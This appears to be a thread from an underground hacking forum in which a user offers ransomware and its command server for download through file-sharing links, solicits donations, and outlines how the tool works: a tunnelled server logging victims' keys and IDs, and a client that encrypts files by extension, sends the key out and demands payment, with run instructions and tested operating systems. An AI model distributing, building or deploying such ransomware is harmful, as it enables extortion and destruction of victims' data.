cool ransomware
by Null_SQL - Thursday December 26, 2024 at 06:03 PM
#1
some great ransomware if anyone needs it Wink
Donations are welcome

ransomware:
https://file.io/7WIx98arqNB1

server:
https://file.io/L4bF52PqXoCt
Program Structure:
[/url]
In order for the program to work from anywhere in the world, the server uses PyNgrok to tunnel it and make the server reacheable from evrywhere.
The project is composed of two main parts/programs: the server and the ransomware
the server is organised in two parts:
  • SQL database: create a SQL database with a CLIENT table where user datas such as key, digits, time are stored in there
  • HTTP server: basic http server to handle POST requests made from the ransomware.
the ransomware is organised in four parts:
  • Find Files: find files by extensions and store the path into path.txt
  • Encrypt Files: encrypt files in path.txt, generate digits id, send key and id
  • Decrypt: ask for money, wait for the key, and decrypt file if key is correct
  • Send data: send data to our http server
How to run
[url=1]

You need to have python3 installed and configured
  • Download the repository via git or zip
  • Install requirements:
    pip install -r requirements.txt
1.Run the server:
python3 server.py
Before running the ransomware, you'll need to modify a few things in ransom.py:
  1. Put the url you've got when you started the server:
  2. I recommend running it in a testing directory, otherwise all of your files will be encrypted:
  3. Run it:
    python3 ransom0.py
    [/url]

[url=1]



Testing
[/url]
This Program have been test on:
  • Windows 10
  • Mac OS Catalina 10.15.6 (19G73)
  • Mac OS Big Sur 11.2.1 (20D74)
Any donation are welcome
[url=1]

Donations are welcome
[url=1][/url]
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Ransomware sales/discussion/recruiting | http://breached26tezcofqla4adzyn22notfqw...an-Appeals if you feel this is incorrect.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Python ransomware Mr_subProcess 11 711 04-09-2025, 10:00 PM
Last Post: HALLOICHBINSOSA
  A ransomware that follow the UNIX philosophy Someone1611 0 427 12-16-2024, 04:37 PM
Last Post: Someone1611
  Looking for Ransomware leaders or group mem to interview as part of a ongoing series. Voodoo6 1 4,339 11-30-2023, 05:18 PM
Last Post: Ashen_one
  Discord rat very cool Kraxs 0 4,258 10-28-2023, 02:20 PM
Last Post: Kraxs

Forum Jump:


 Users browsing this thread: